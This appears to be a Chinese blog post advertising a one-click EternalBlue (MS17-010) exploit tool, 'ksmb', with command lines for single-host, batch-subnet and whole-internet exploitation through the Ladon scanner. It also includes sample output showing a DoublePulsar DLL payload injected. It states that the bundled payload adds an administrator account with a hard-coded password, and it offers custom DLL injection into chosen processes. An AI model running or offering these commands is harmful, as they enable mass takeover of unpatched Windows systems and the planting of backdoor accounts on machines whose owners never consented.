zoukankan      html  css  js  c++  java
  • 〖EXP〗NSA MS17010永恒之蓝一键工具

    漏洞简介

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

    漏洞检测

    无损检测,不会对目标造成任何危害,大家无需担心

    Ladon 192.168.1.8 MS17010
    Ladon 192.168.1.8/24 MS17010
    Ladon 192.168.1.8/c MS17010

    检测发现存在漏洞高亮显示
    image

    独立使用

    只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网

    PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。

    C:Usersk8gegeDesktopSmbExp>ksmb 192.168.1.89
    MS17010-EXP ETERNALBLUE by K8gege
    
    IP:  192.168.1.89
    OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
    VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
    B)
    EXP: Use Eternalblue & Doublepulsar
    DLL: x64 Payload Injected
    

    只IP默认445端口

    ksmb 192.168.1.89

    自定义端口

    ksmb 192.168.1.89 445
    适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦

    自定义DLL

    ksmb 192.168.1.89 445 mydll.dll

    注入指定进程

    ksmb 192.168.1.89 445 mydll.dll explorer.exe

    Ladon调用

    使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。

    C:Usersk8gegeDesktopSmbExp>Ladon 192.168.1.89 ksmb.exe
    Ladon 7.5
    Start: 2020-12-17 23:40:16
    Runtime: .net 2.0  ME: x64 OS: x64
    OS Name: Microsoft Windows 8.1 Enterprise
    RunUser: k8gege PR: -IsUser
    PID: 5804  CurrentProcess: Ladon
    
    Call DiyMoudle (c# exe)
    load ksmb.exe
    ICMP: 192.168.1.89      00-0C-29-CF-FE-E1       VMware
    MS17010-EXP ETERNALBLUE by K8gege
    
    IP:  192.168.1.89
    OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
    VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
    B)
    EXP: Use Eternalblue & Doublepulsar
    DLL: x64 Payload Injected
    

    批量利用

    Ladon 192.168.1.89/c ksmb.exe
    Ladon 192.168.1.89/24 ksmb.exe

    全网扫描

    Ladon 0.0.0.0-255.255.255.255 ksmb.exe

    成功结果

    自带DLL会添加以下管理员用户
    k8ms17010exp K8gege520!@#

    可替换DLL,执行自定义功能

    image

    下载

    EXP小密圈内下载

  • 相关阅读:
    LeetCode 24. Swap Nodes in Pairs (两两交换链表中的节点)
    LeetCode 1041. Robot Bounded In Circle (困于环中的机器人)
    LeetCode 1037. Valid Boomerang (有效的回旋镖)
    LeetCode 1108. Defanging an IP Address (IP 地址无效化)
    LeetCode 704. Binary Search (二分查找)
    LeetCode 744. Find Smallest Letter Greater Than Target (寻找比目标字母大的最小字母)
    LeetCode 852. Peak Index in a Mountain Array (山脉数组的峰顶索引)
    LeetCode 817. Linked List Components (链表组件)
    LeetCode 1019. Next Greater Node In Linked List (链表中的下一个更大节点)
    29. Divide Two Integers
  • 原文地址:https://www.cnblogs.com/k8gege/p/14238155.html
Copyright © 2011-2022 走看看